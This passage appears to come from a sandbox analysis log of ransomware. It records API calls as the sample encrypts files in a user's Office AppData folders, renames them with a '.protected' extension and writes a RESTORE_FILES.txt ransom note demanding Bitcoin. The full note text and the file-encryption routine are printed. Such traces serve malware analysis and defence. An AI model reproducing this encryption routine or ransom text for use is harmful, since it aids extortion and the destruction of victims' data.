pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.196] StrStrIW (lpFirst="MSO1033.acl", lpSrch=".protected") returned 0x0 [0090.196] lstrcmpW (lpString1="MSO1033.acl", lpString2="RESTORE_FILES.txt") returned -1 [0090.196] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.196] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".txt") returned 0x0 [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".rar") returned 0x0 [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".zip") returned 0x0 [0090.200] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.203] CloseHandle (hObject=0x14c) returned 1 [0090.203] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.protected") returned 88 [0090.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.protected")) returned 1 [0090.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Program Files (x86)") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0090.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 73 [0090.204] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0090.204] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0090.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned 75 [0090.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.") returned 75 [0090.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\..") returned 76 [0090.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="Windows") returned -1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="Program Files") returned -1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="Program Files (x86)") returned -1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="$Recycle.bin") returned 1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="System Volume Information") returned -1 [0090.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.205] StrStrIW (lpFirst="Global.LNK", lpSrch=".protected") returned 0x0 [0090.205] lstrcmpW (lpString1="Global.LNK", lpString2="RESTORE_FILES.txt") returned -1 [0090.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW (lpFirst="Global.LNK", lpSrch=".txt") returned 0x0 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW (lpFirst="Global.LNK", lpSrch=".rar") returned 0x0 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW (lpFirst="Global.LNK", lpSrch=".zip") returned 0x0 [0090.206] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x59a, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.211] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x59a, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x59a, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.212] CloseHandle (hObject=0x150) returned 1 [0090.212] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.protected") returned 94 [0090.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.protected")) returned 1 [0090.213] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.213] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0090.213] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0090.214] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.214] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0090.214] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0090.215] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x34, lpOverlapped=0x0) returned 1 [0090.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.216] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x34, lpOverlapped=0x0) returned 1 [0090.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.216] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.217] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.217] CloseHandle (hObject=0x150) returned 1 [0090.217] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.protected") returned 93 [0090.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.protected")) returned 1 [0090.223] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Windows") returned -1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Program Files") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Program Files (x86)") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="$Recycle.bin") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="System Volume Information") returned 1 [0090.223] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.223] StrStrIW (lpFirst="Templates.LNK", lpSrch=".protected") returned 0x0 [0090.224] lstrcmpW (lpString1="Templates.LNK", lpString2="RESTORE_FILES.txt") returned 1 [0090.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.224] StrStrW (lpFirst="Templates.LNK", lpSrch=".txt") returned 0x0 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.224] StrStrW (lpFirst="Templates.LNK", lpSrch=".rar") returned 0x0 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.225] StrStrW (lpFirst="Templates.LNK", lpSrch=".zip") returned 0x0 [0090.225] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x472, lpOverlapped=0x0) returned 1 [0090.231] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffb8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x472, lpOverlapped=0x0) returned 1 [0090.231] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.231] CloseHandle (hObject=0x150) returned 1 [0090.232] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.protected") returned 97 [0090.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.protected")) returned 1 [0090.233] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.233] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.233] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\RESTORE_FILES.txt") returned 91 [0090.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.234] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.234] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.235] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.235] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.235] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.235] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.235] CloseHandle (hObject=0x14c) returned 1 [0090.236] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.236] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.236] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RESTORE_FILES.txt") returned 84 [0090.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.237] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: 